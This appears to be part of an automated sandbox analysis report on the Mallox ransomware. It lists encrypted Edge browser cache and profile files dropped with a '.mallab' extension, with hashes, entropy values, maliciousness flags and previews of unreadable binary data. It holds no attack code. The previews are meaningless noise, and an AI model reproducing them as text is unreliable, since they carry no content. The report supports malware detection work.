.........M$=f..'.....-V....]5x..B.....&.....(....-..YE?.../D.....J...=d.q....X.~lA..t..;.glz..5.9]..'..I..........[.,._....n...G.,...$6$.T..........p{..v......`MW(.W@F%:..[.Vd...j.)q.<...)..{.J.F.Q.........X.E={..:n..f.iKe...........(.{..2.8_..vJ..C.K^.m........t..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):45164
                    Entropy (8bit):7.995852196306439
                    Encrypted:true
                    SSDEEP:768:NWbkg4CIuKbsZM1h4KQMP2xVwCAol39XCIhIXaG8z9gYDbMZU4t2:sAdnP7lChlxCtaG7U4c
                    MD5:0FA5FC5ED6816AE3DB5D8ACB63167C84
                    SHA1:B7685F2702D9AAD3C1AE6F2589EE343950600E73
                    SHA-256:8B76463813820B24F01EA7F264B7C504EA2E11B3F166731A6D9271F6EEB14BBD
                    SHA-512:2E1B6F51C1FDD0D6B32B65809C4B3FF760E5E49B2B8D07274367B0ACC4E1DAEED986D08B090AE103D485E6E0DFB10E0FD4D0AEC98F9E1963113332BCC1231457
                    Malicious:false
                    Preview:.S\kW...w..}....gV..t...>~..w.$..RHZ...cg.n^......j.<....e....M.....(3r.)|V..Ff.c.!} ..z...!c...h..|..`..-YB.Nl]P..D...R...N.B..-...fDQ..IxG.......>...~}/.|k...u.S.Xe.u|.4...w....Y0.PS.].].=.{w.'...I .d.]..~;4Z....n$..l.I.r.y..'b...~.^E}.1.#c.]Bida.]y\`.!..-.....d.....y...+.(..Y.w.X.$Q,..jJ@...t.n.:n.S..o.L.J.x.y.....>Bzj{..U.3s.S.;..<...)..Q/pEI..'............4......R.....$...DD..p.O%.........'pg..,].!.dD%"(...*.d....../.l..z..Z.)}}o.X.8...<....x.Gy...r....HF.Y...J.....4s...A.,P...%..NQs....8.k)..<........@.6}|.r..h0.[Y.....XS.Isj.G...9mo[......J'._^.-..@...q..C.#..t&..>..S......qF.OU...S.mG.P....dI..Nf..9.wi.h....i3....{..A*...`.SA.I.r.?5zY.2.....]...m{.P`...4.h.2.,. g........cs|.m........{.k.@.k.....^NJ......u........f..._<....#.l..z......h.".[R..T.....@.^....q.)(t.Y'q.)P.~6]....\.*..kQe..a...{d....jI.*..DZAj......o+....e.n,.....|....Ax_........IS.5.^J.U......Q.>.d.^.e.......V....$...`..a....."=...S..+.K..5.. D9v"....>.C(n.d

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999265140444031
                    Encrypted:true
                    SSDEEP:6144:8SLdkVhOlYFtj/M3LL/z7EGTLaLOB5u1fAP:tdkmAJKbzIYLaSB5cw
                    MD5:FCA5C5E23C5152600E733A05027FF4E5
                    SHA1:BA7028C7CBC38926AE13859E5BCF72F1F0DAF5CD
                    SHA-256:6F7C132AD5503D68BFB1F5DE04E62C050B9CD66C80A06072E447B63D2105F99E
                    SHA-512:56641058C86FEDD31D33DF6F4EBF1924E9B486456A4FB1C790EE0CB7C177D998519A1D0854A0AE951C24810AACE089ACA0D8FF80DB7714E491194996EFD3FF4C
                    Malicious:false
                    Preview:%.mKI...l.......D|`........5..E.Q..|......+}..ru.xE.F:A^...70..........c.4Z...!/.V&(>.a.TO*3M..A#.T.C....I......n.].............\.&.Zh9&..I.zM.a.<As.c.o.\...B.....}a.y\..c)D.9{]Y....h` ...1C....fOa.n..].UCs.).}-.z.!..]7(..%*D........s.(*.oUu..Hcv..%j.p.YX....~..a..^.7....H...y..QR...0!S..;...?.'@.^.V.m.h.......c.}.....Oq.*No.....P..dk....L.....e.X.)....5....P.....b.>N.....X$7...-T~b..D..2}......|)...V.Y..6.+...oI...g.eb.[<.1)..o.F(........E......+.M...c.v._"8.!.9=WfM..B.3../.0..Y.$............j%...Z...b......(;.}.5....Z.~..*.....F.....E...4TNr||..^J:.*KG}1........5.T.#..@6,tg.W.?|...;$....?.s......S.m...".F.....^2..7.....a.N.......Z8.@..Nu.....@p.WT96p......<m.I....;,t.......U......w...._......\......C.5+.6...\w..."{...i.h..lS,k.B..Eu... H..3+....r.o.E.y..._.B....7.{.[..i..$o.La8...1.O.....4.(g.c.j.....o.{.t_..(.Ix...Z~.....CNi...C.V..$V..[...;.$o.sBm.g#.m..........|.-....'..!/.). .,..T........|.2....)Sw\A=...[.i;.$).?....{..R.......NM

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4202604
                    Entropy (8bit):7.999956747879277
                    Encrypted:true
                    SSDEEP:98304:ewFmd3rFWwrg8ZbpM/5nPRGjZtdYYknlBn22rdTkYgh3:jERpWwrgMpsoAnlB22zc3
                    MD5:C677107685B1E90CBB8997622440AB3B
                    SHA1:DD55AF1BF377663B1B9391FB36C1D1009C959343
                    SHA-256:74BC0B66E734D40024E8CB1B86FDB22A2AFFD196A03403E599548AF344B1BFAE
                    SHA-512:4C4072ADA742BBCBD426B543B9EB8D15001C3A851BD528C4A3E99107D73D8B667CCCDB16ECE45CAFD85786DB3E791DEB69C9B7AC176C711331AEA2194134A069
                    Malicious:false
                    Preview:cV.!..k...:.v....O...2v.|.0O..7h.?M......b..-..*......<...4.0.7l...,x.w.!tR.=R..D.Iz.......k...:.;7.c...o....(s....$T.......p.W.r.^GF...oS..8Frs.zg...3...VSh.i.@.......f......EBd.&.@Yt....+...Q+....O.m.....Zi..L..2y...L@"o][.hqYO..*ju.x.... w.<w....?*f}....(m.......hr.W,j.....6.,..k..u~.p.R....w;;.uD.:..S.[.R....f.&.....$.......V..$...:+y..W"..E...Qy..p .x.x.DN.v...sR..}i....1G.{b.`....s......-...B.....t.3V{..y...2...IIS.....\....a.2.....-.<Y"....U5...f.q.........d.9s......./....0..a.o.Ss^.nJ.......1...M=dT.m.G...+..7.......6....^;.0..\......o^.......bI.cu.9......Q2.......=r.'/....N...]z..J....tpOfa.@....L?*[.o.{..0.B^.3.j.&.~...EX...I&[.l..:..n.......WM..Hr.....>...;jA4EI.B.H..).c..<.H:.W...U....f.h.+.h...!.M`..<...l..$...<].2..h..........4.j5.j.P.e3..........Dr..4........-.p..N.G.Y.0Z.N.....5-.....5..l.........r-.+.......P..eI...+.....?7pbZ.@_.u[...n..5.j..D.n-.A.7?;.R.....P...lV9)....(..0.....1.H..lK>..W.^.=.'.Z...c..Qp....XAl..KP

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000001.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):157554
                    Entropy (8bit):7.998822616958935
                    Encrypted:true
                    SSDEEP:3072:As8xEOMplt7flTcnEEwZ+rvlwlnl8gUnIMIn8JFA2Z2BHtq8B:gqOMpnlTcEE3vklPUIME8k2ZOU8B
                    MD5:3E036E612E5BF10410991BE1E39796CC
                    SHA1:56E1C8839C3FEBC2048A41BE692E085B597DBA89
                    SHA-256:559145911BE3620677D5B23332B5FFD5A9762FAC9F8F49B92160BEB43F714E88
                    SHA-512:68982F31A66E87D0A9E1DFAB92197ACE539C89ABAC76F22F7EA959DECD4D02780CAB29E5CB88CCEC590265DD4CC8C861B8DE5C8645AB3AD2CC52AE77E95A9CA7
                    Malicious:false
                    Preview:{.ADE.9...HW...a.#PY6?i..i..C.F.,k...`g.K.0wYw...f.#.<b.....B7qj..T.E.c....94..%.:.&..5..:{*m.<.<).X.>8(..W....c...2.9`......0&../....D.....}...A.h../..;.y...n..T$Gp....y.....&rQ(.U......qI...w.]:*.$f..i.....E.qF.wd>]....m^..S>.qS.!..3.....1}....E..1c...b.d.8.....E.<d2......8.XA[....f.,......&.|<G..t.Zt.Y.e?|r.-L.p..Z.{8.i~La.L.......z..C...u..K..5....lSgG.a`.&.....2.P.!.../....3h..v....O^...#.,.\...E].oU....x~..!.x.... .l..K.....k..?u.......}!cgj.y....../.P5|.,.D3T..EmN....,p..t~=.."..L.]....u.f.Z......V.1.4.g...(.Lv..P.....U..u....O@r.F.D.5.......#...X...8......,...&.{j.0.f.....>a0....B!-....T<x..mV...O0}.f.*..m(|.fe...F..&.o...!Zu..\..j`..>...<g...z....x.{..p...b.2xp.'.c.8f..bs...4W.?q.]......23...%.w#Pw$..5h..tt.bg.I.....v..2.+.........,-...Z..$J...0@.o.+......$.^fn.."...ci....QFd[.q1.\.2...u.m...m......7N..r{..^..=.,..;.=@..*............O0....9..!.a.B...._&t..1..W.q.u....7jo..\...S#...o.Q..$G2.m..b.4..?.C.a...u.\.|.O...".m.>u|.......

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000002.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:DOS executable (COM, 0x8C-variant)
                    Category:dropped
                    Size (bytes):68041
                    Entropy (8bit):7.997110893791567
                    Encrypted:true
                    SSDEEP:1536:PWP8jMdrucGYAbUXIIXvK6mTCWudg+kGAxgB5DoxJ0kJO:uaWrucG7cTvmMdVAyVoxNo
                    MD5:3C8518054EED8E02EADADC932268DB37
                    SHA1:7A5443DECD544E9B6271A46DCC88B5BA394C5879
                    SHA-256:FAD94BFCAB4A45AD756B2C3A0B7414F5CACCAC91C5B96A33F1DB5E43E4789079
                    SHA-512:0D281C3F637BF800389194E5B4BAABB6C961294A13E466DFB8CFFEE1368D290295C9CD25D3289D326CE572BC68B30A89DF32852A2FCF8749F87BB46260283E53
                    Malicious:false
                    Preview:.n.IxJ.f....4\b.%.......Y'..-......l...vad^.*.....?...~.)..%.?.Y.<c.J..a..4...l....]..P....YJ..(/.!.b.6J.G.Tlb_..7..Y._g...?%..-.....?...9::........XF.:J,..U....}.J...H...d~...j...+..N..F....+".7..?w[.........h.%.9P.>.8K.w{I.+...qOkj..1...n;.]...K."....[....'.:.8D~...[m...QyW!..+~..5t...,<...,..T\@.t.B..O.N9w...zJ0.u.....1t....s...3"..[.`?h9.1.`S&..qB..:F[?bM...2..6...O?.nc.........>6,B:....u.. ....*.H~...6... .=0J.t..[S..*..?..it......j..\E...&...Yfym..#..P.+L.J..9.v.,w......~...s..Z..Z....I...#.*.m..K.... ........5...O.}...qp.m...||D .X8.HX...4...^..,...0..[.s.........y......Z...mv.,...Wb\.I7...x....._...9..C8..D..S..:).F..ho.Y.9jFX..c"...:...s..aB3C.0.>..cSkP&%..>..,\O..j..o,....X).UB.M.B...ae.P~...........0.O...~*...)8..hJ..../.Y...a.U`..;#W....b......S8P..Z..`.....(T. (.:]%G/...7".U1.q>PW.../...1...U..v......L..m.M.....^....4.@[m....l9x...........+....zG......6/.d...1..47...wj:....}.X..?...../0.P....!D../`....k..9.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000003.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):398421
                    Entropy (8bit):7.999578906885673
                    Encrypted:true
                    SSDEEP:12288:JSAmuZKZcdb0JdGNO+1+jeL7mAfjoPO75:JSKb0dOxxmAfsk5
                    MD5:FDCDF24C05B84FFFC5C00D810DCE0157
                    SHA1:13274C75D71962367DA1E7ECE8E2291DB0528DFF
                    SHA-256:9A0FFE7758C2FCC575D68FCAAA4A56E91B4A751DD919761AC37E5A03F5840BF4
                    SHA-512:7CE6BD599EFE63F8173C8264D2ABBFDE14F966632DE5CA5A8BFFBC81668B5EB5D9E2E8D44984BAFF0384C6F1D3CFE6DADA0CACD917E5803CD1CE90F455580780
                    Malicious:false
                    Preview:3..=N.....*.$.)..~/|>.R.O....%....#jOR.....M.!......y.z*...R..y.O.&......H.=....8.C......&.4._...G..E4,3..s..rJ.R.....l...Q...h.p.`.|.Id...o.K2.3.n.....]T.....zx...j.0..........Nb..........`.....W..~..7....L.ev.c7<...../KXo.(,.;V..!.0g...@.Gg..:M./.]...l..yMGnFJ......+....r... ..M .*~E"8.t...V.,..V.I5.*.?..9..gZ....,_~.0{....S..F..C!].`.....|j....o..zE.'..T.$M..cF..{._X....\.Y2.}..8A....~*..!l4.6u.:._Y.T....3.7n%9......`UH/;...+D..R.....$..4..p4.........e....=..L...XK.Qb..sKg8....wx\...Y...x.O.w.U&$mz?K?...c..eHr.....r...+.7R?y}M2.M...!....7s.9.5.....k.TH!....+IX.`..zj. ...|..V..M.....].J><..r$t....&._.RR#...W%..:..z./).&@..Q.~@%....G]..<...B.l.xU.n..M:...Lh8{....x.....1.....j..N..=....B...L?hN.B.r|x...<.r8v.=.|..Q.....3..^=.+.....{q..[.i..N...R.2dQ^D..E>b5..s[9... ...0.[....W.d...!.p..&.n.]>.-.1..C.D.&%tu...1L=u5.x\...[..g.f_..;.t3V...+...=..]......B..q......E.J^9...n.......PSm:.N.(7..<.AE.....j.(v*.`...wxf...:Y.)..%......'...cOh..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Cache\Cache_Data\index.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):524764
                    Entropy (8bit):7.99960587118728
                    Encrypted:true
                    SSDEEP:12288:2PZ1l/4QdKLxdZSGtNBTnK2aqID7kwDhG3CM1pQv/YTu:2PPRZdKLzZ5R71aT7/DhG3CMsv/7
                    MD5:6C6BC0EB3BD6C22C48C51C9D447FD923
                    SHA1:D7623B0C60A3961AF7C7A07E4E9477678357F4C2
                    SHA-256:F3EB69E781C099D744DAFA3B6B5DBE1D40BC30C119B7F04442AA12A88A129D25
                    SHA-512:B561944A70CF97E8A6BFD60776162C03FA2B69D1E3FA25140A12AA7E812E84B317ABA8E0BC4C7FD108A016721AC01C27C18CFA4C759210DF4ADA3903DE5986C6
                    Malicious:false
                    Preview:q.....$y>\.9.#KcF.v)..Y..L1.s........Q`r.SAk.u.......-=.a`.5..z.%fIC....e..>m.F.....!@q8.ZJ~...E......:....i..DD.kH....bF1..>....p$..K..;.PTy(.....8.Y..@..;B...^.......B.Vs.....{.7....&1.....gH.L...O.W.Mm..r....q3t.:C.N..P?..=..Z[+v.cj6.]!.~..8So.nFf.....G.K....^.O..2...*. ......w..j..\:....S....-T....r.C..YvX.s.h].^.t`.iG^P.0..L..i.{.,.j^.,.Z.:.ev..z...$p...U...7X.....?.${...vB..^.M]..}\....)..=.Z.>.\..<.t....d.nN.V..T.R.O... E..s....NX....W.Q..u^...u......|.t..pS.....n."d.&9....X...'....Lapcr..*c.f..w....:....-I.L.?M4..G.rSp...Wa..._.v.m..K.;k.x.[V.x..&...9..Z..a.M._......Jl.t.\4..$....y p.........N1...{J...7..a....D....?.BR..%<50..*..:.@..deki4_..=..C..'%.d.t+U5....5...=....GC.>..|..B....._Hq[...&..........B..~..Ym..s....N..........c./.J.5..OE..[.z..y..d.....N..........5..yh..`..A....D...S.D.......L"0HK..tm.q..3..L.....j!..:. ..u..u..g6.~...}...D....&z[........)S..v..Y..a...\..^?!..W...(HsP1[..Rz.S..&.....D..F?..<.M.5..p.n...S?p

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\DawnCache\data_1.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999325308028859
                    Encrypted:true
                    SSDEEP:6144:vt9zDOis2JqztkYpM61eH7EWeu9vk2j9/41RHN6jPw:vt9zDaAZ/Dp4fwjPw
                    MD5:A892C72EF1C8DA02652D67E652F0D0B2
                    SHA1:9922E1EAE1BBECC51BC206F4B4C4169359037F39
                    SHA-256:84EFB5A65D468CF24E1784E0311F3F82BF087F8B0186F6F7FD2A324CAAEA8070
                    SHA-512:D501FD49B4F6497B7A9A1793DB372F245B9DBB2F9B728FFCF9DED1EEAA6B383DD86C321F1A62466F2858BD27B076B449319C4EEF9A714EFD2A1B60FF6C2E5B0E
                    Malicious:true
                    Preview:{"...e..4..vc@...*.$.z1b.H...L..........\ ...I+y.C.V/.,'h:...-..4.jX.........._.......gp&[..3yn..dPf..:..w....x..\.e.p....n$.D.....2....".r....T..A....4+..nt.i..R.r`...]8.. u...b..5....... .YI..k>.....F..5.^y`@..;XDSe.J....5.~#....R.ji......l.O......^v.$[..^..4u.VE....r<.Tx.............7......K.zi...~..t....i....u...3..x[.B.{ ../.O..........|.]X.).....K...fB.H.o..."Z.R1....,./g~..n.D.,...}.).MEp./...u+........m...Q...yv...>...p.d..Z.....'......w..h)B...pTH.p.W...@H..P.+/...=v.vO(:aG.c. ...."...>.Nd.\...b..(.%.....!.C....t....{.mJ.Z=......^Ywn...Rk8.a?..B........g4.|ba...a.~...S.>\!..~.....M.#..Kc6........9...`.....&.G.L...?.+..y_.#.X....V.....i...Y.9&....\.+!.;...=7.eE..*..q^..W.(....IMJ....u-e/.E.o..z....f.....s..Z.N..2.....D3...#tQ-.Y:.)...K.>_(......6......6g_@.s........p.. @c..C....`...Yy...y...<>......./`........S..|~..d...\.<<$..LIM..`...=y......s..g....A;.!.S.a430.7.-..#...h`.*..l.=*....|.u..e.R..s.$.u..)...'.'.V...,

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\DawnCache\index.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.99939419669962
                    Encrypted:true
                    SSDEEP:6144:dab7CE4d6xgIqAMeI4whshhBW0hFgDYAQXG5mnhsPGAee:dKJ4IgIqhpshi0FgsAQXG5s/W
                    MD5:5932CC9100AEBAED557B556B61A32F01
                    SHA1:DCB7370945D0EB5016607B0944A6B083DAD09E97
                    SHA-256:48E271D12DC5E0D9001CC58728942FD3F238E091C82511FF3F370045850AE975
                    SHA-512:ACB31F25214C74A443E9C2BD5738056479F0FA96929E9D136D2F70FAFD827CA4020B35C06B6F0AD3D5A51567DA3AA22AE4DCE0F9893CF5A973DE9836D9DF2B62
                    Malicious:true
                    Preview:...9.I.,.F...B..3.........'hV..Zog8...+$.3.L.....V.=..\.B. ...\....,.2'n!./..I.J.'{.e.5...}..".."l1_..M.C........).....$.@`....+....T^&+J.q.V....{..+.]..",.....*5y.a..no....`....R....h..Y......8k.\VrZ,?m............ .Wq...~M/{|K.[.5X..+..j......e.X....a.......Q.X.....PK.8`..9...u...d..4fL...E/..xM.k...~"..&DLM.a...I.x....v..m...,q^....t3.c.H.&^.H....!...|Ow.....3.=J@`.7?.._r.......VV.e..E."W?...6H..*2x.;d.....V.=..9v.....5.H8.{....7\.r......7.r..C.~t..4..1-..\.+.P.R....&..-.].U.nz[....28wx".....S..5.X_...V..ci.Ir...=.U3P....(.^.....L.!./.k....(...YO..6!..B....z............"=...G.[..uv.....w...]../f>..".|.ZN`...k....t.#e.i..w......0.u!..U`k*|T.........\)..K.G.6...-pD..p..f.,.2..Ct...r..h......dp..c..s..rsUIA....}.Y..,.0.f..;8..A....` bTH. 5/.ux2.......&..y..` ...*}..bw%1.........>....gfp......X.&.3M.$...|...y...C+....-')M.S.....j?.0Dxs..7g.n.Pbp...k?..n2\a....e.z....l.hb....."....#P..F..V.y...9;.Gq.P..x.&N...}.=N9.K...,\....P.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32876
                    Entropy (8bit):7.99442506545139
                    Encrypted:true
                    SSDEEP:768:xeZMSI6s98uN3YeE7h9xkTrE1H+Z7/Hn/qMaY77ArdwhwBv4oun:xeZTA8777aI1eV1aYRhwBv4rn
                    MD5:DCB66E4DB925300F948879E8A9B70648
                    SHA1:ED82AA6A06E7735E360B0A7BB94C410EE0862077
                    SHA-256:E99233EB8A688B071B744EA67C312BB01E303FAA227C519B4EBE3DC00711033A
                    SHA-512:7E69919FA2AAB44909879E202784E148C6F895DCC918C2EB709724F1972820BAA69E8E24BA1D5BDF53E976DF3C39E1EA2E01A3F1D200E6729D981C18B35DA11E
                    Malicious:true
                    Preview:Y...O@d.Zp"..E.5..R.fy.+....DPdE.....D.^7.m...K.):#.9..zO..o,!....Jb..f.^W<LnEL.h#...bC.O.(.%.D'...=...t.bq.`..Y.6....*.5.U.....@..deb..=......,...xd.;HRw.V.....qu............_!.........w^Y.Y...N...D}B}..z...i$~;......}........fi}e..?s...Y.'/`.v+..-..K..q.y...p.A.foS..g.E.iw.......w5...Rr.j...s.X..M..=.F:..}q..n.J..4.....%6ryIVr..x.J#n..M5..\.....\e...O.y..h\f*...[lk?.....5...?>sD.(:c[!%.......Dl. .|..R.....&.`..~].54D.Ty..X.f4.).@.Y.V...<d..zKx.h..~....X....3...r.....SIU4.p-0...+....@.......LE.......59w....Y.X.V.Ck.&+..b.<...f..#.W9V..........nO.w...........E"X.M@.<..c.f......@.B.@m.`.YHG'.y....f.h.JL...d...0..........=.....1.x.<..l..Z+.......=.X.T_...... .Ryk..fT.B.................'.t..._._..U.sL.xgc....~B..E.:l.T >..<..ND.P.....F.g. j..$.1.....=..h.-..b(.75.kLvw..n..B..6X.P..@?...p.M1..1K.;...1...60d...z~.......a(m.......2.]\5r......M.C...._.....D...m<..(.(X..c...8l....(.......aA....}.^pOG>...K."...._P.C.\22...L...*.!..b......a+.[

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20588
                    Entropy (8bit):7.992037545129772
                    Encrypted:true
                    SSDEEP:384:8DoC4w80ZCPxuLo47HjILMvU3cvMj7JRRahJaSMtzT3pZFUv0qI08KUhPvA:8oCJwPoEosPMv4Z6ESMhzrZqQFA
                    MD5:A393946081AECC25CD1C41E23A11998D
                    SHA1:987A0CCD701AE9880C1C6BF745C0FEAC8CFA3129
                    SHA-256:4EFA4B4A4528BC402A2B1FA112C5291A9F67F06474B016C4BC1252EB906C0D51
                    SHA-512:996FFC2B727217E053BD1F94D7AE0130DA86390D30C47A375F558A897610770015026618C4932C9C2C29CEDF0257F71B9496F356B8367F63118C30CEB181B586
                    Malicious:true
                    Preview:_MsGp!dV.Y.5...w...d.e...p..`.iQ.%...j.U,5..1.v....g,.D.....L.g'..A-..!W.....g.!3t.n.V..n...T../.y.[hQI.....s.r..*..xw?..*{.G....'(sz%K=HW%...;o..A.....*....l.1.s.#.m..6.>XF._Is..-...tB.!...}YT..3.J......ra......y.D..nx.@...^.!..H.&."..B.l/e..B.>.3J..M;;Jf.YH-..i.)W,....R,)..........,....t.(.I.:.C".F... %.e.F.u....!.\.._.H......[..H.%A.PD.!.N.c..*.I6.i..B$Q..c]..$..a..k..*...F....F....u.9.(Y..5..u7&.H.I.w.CM.'E.EOBRov...`y..n....4...1.. .c:..K....d....g.7EF.........).9...S..a.._.v....I........L...[...3...)+.....T.7...J..M...."/2..."....=y[F..OY....k.....+F+_r..a....x.L^....=x.C.Z...(..'........ry....._L..\<.{.`3..2..X..R....-....:.M-......@._..|....s. D..5<N.=................d._g.>.u4.1......D..t.._..x.....X...4=....GI.....y...w.k..>jdMH.C...#.T..... .G./..3..-.V......jv....>...Q.$.x...%".5s..&..V...A....ww..`c]T`.;...m*...|B....z.e.&~.o8...."y.64A.nU..!=aw..&...."v...M..t.p..%q-O.B...M.....w....O.1.A.<.JCP.p....^.u0..r.....2AN...T6..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\ExtensionActivityEdge.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32876
                    Entropy (8bit):7.994688687241642
                    Encrypted:true
                    SSDEEP:768:OWUSvubRkUTIJU1csLlAiGrBwPOIewwO207V1yCt4HflC:OD/ukIJYtA5r9Qd20byCmHg
                    MD5:144AA64FD39284B024B10EE1B127D54D
                    SHA1:A0842DF59079678460D01B112D985CC99B8DBEFA
                    SHA-256:B66D32D2954F018E68BE2FDCFF89B8EFB31266D86CEFD1FC0C0253FA64B1C8F8
                    SHA-512:6DCBD9DC8450D6AFB7CD5DC235891DE95F2BF141C90F341FE80CA5B41E85835788578C11602A471355D428FBA3418820CD4B792058286CB166FFF0D1C4D70C6B
                    Malicious:true
                    Preview:=...v.SVV.N.2...g.V...B...%..4.!.x.....U.C)U6..Ogz.......m....}.5........:v9.I..Mo.$.R....fp.U..M..........O..<....P....g....F].iM..pN.K.4N.]R....RM..}eg.k%...o.h.P..s...._g.o/:,0..zl.2I.-?n..w'.)&.DC.i..Lc#.6....E.......i.. ..-z...CY...vM.`D....H.0..3=.a)W........k.'?.+,.!..@.'W...}a;..=..7.l.........9....N.......a|.dQE...".Ss....e...:..4.}............T..........3!q.&.=].t..!...... {._.|..owFj.i....R8i..XI...l.D.F4..ne.r.k.?i6.......3b.......U]|..(NGk.W....*....a....../..w/.m:<..&j.J..Py......i..FX.y......`.)./.pj.`.f.O,..5[..6....")......|.V.:ex...n..k`..1[.....|:H.@.....)Z1..>."....d..._a......0.+.B...R.2@...BC.do.J.._.g...2S.....Ry:.8...>.^i_..r.Kl(m..J..!S&Q.z..\...dZ...H.....i"O..9....T.'..t{..A..#.!M.t:....C...f.....F$=*..j.....<2\.eL?.._;......f.v.a!w...@iy.2..&...~Go.......e.2..tB;4.....m...d..c..W~......G..y.1.!.i('.....k....W|...(.z.Z.7...._.Y~....y....@>.`..B{..u3....{....X..o...S.2..Wz.V.J6..7....3.\....E...rV.-#.*.d<.r._ I<0.'...|

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata\verified_contents.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):18626
                    Entropy (8bit):7.98985880894616
                    Encrypted:false
                    SSDEEP:384:FD63YNkqQ4sA0xCohkw/1M3LwULinQLWVVniMwI:FDGopCAwhkKyzLmQLsVr
                    MD5:45E10B739AA9810A92E12CBBB37FCD9C
                    SHA1:8A09BA01B7EC366106C4F986AC04C85F09E581ED
                    SHA-256:A819B04B300E3E393D989D952FABF6B7FACF2DECFFB0AD89EBA3FD3C4815DD94
                    SHA-512:0D97FA1DBE7BDB8C3E188DE075F355FE6BCB13F2EEB5C436DBC442674A6E1E3F1A5E8C62D98380C3A06EBBCDAE15D255D39F8A0AA8BE56CD92118FCD763D327D
                    Malicious:false
                    Preview:.......~....(D..&..q+...]..??Z..Gk..-.iMG.S....<u...04Z.h.t.!..........4.!.....r.Q.=$x..3.....wY.\...<.*..,..d0x..._.d....!.7[.....N.l.P86.........e.5.3.<..;2.... .2.....B.;%....x/.'.W.?..].#;.nd....H..r#...4.Dw....E.|.......^b......ce.&(&._.y.m...o.[....{NQ.:p....a..M..&.".#..%.f.....g..1....U_m.{>............v..9.4.......[...>H..^d...&@.>..DB..1........9..;.....O....Q.J.5[.$..|..d..5.....E..67.......LO.1[...=k...R......~.9.C....x......j.....:.wE.fc...U1..7n5._.o...L....e.....r.%.C.........2..b.......:....hU..|....].5[n....a.....N..(9..|.u@..0...........rT...........I.Z..[)4..y...Z.......s.+".8...........l3..........M.[Qt.Y...p.t..\.{...4...m.......P..$....~..o..j....fl6~`@.<...I....E.Sn.}n~..t...?2....F"m,|{A....7.P1..x...g......".;O... S......aW]..w..0....'.ss.U.LEK.A.D.O.....^..]F.m._....[....$...\..e...x4.q..t...(%....nv.K_.+3.<k8.d......G..^x.)Th.........T.*1.a.%.....L.....FRm....r..N.`....w..KP(`.q.F.{....N,..C......A.nIE..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):80377
                    Entropy (8bit):7.9979188875750795
                    Encrypted:true
                    SSDEEP:1536:JeTLlVhDE9d/UhBbkAvv8M3HoNgiQtXVVTaG9WE6D0DJ7zGcYmlZsjK6H:M57DE9FUhPvvaNgPltaQl/G/qsB
                    MD5:C45529D01F56E7454454B068B43FE878
                    SHA1:5798A97A0238C8BCB0978A55DE3F27878511E9F6
                    SHA-256:3B9E3A156A71C976729A6A5CDA97E1E93EA3ACB916C43A2323B7480F19771172
                    SHA-512:35C2891B890E91531CAD07D78FD599B495B2DA427978B680ABE0AE8395321E7A4FA87332680C522E6AAE05CD9C1E7B74AD23007671F72B08B79111592BBE24E8
                    Malicious:true
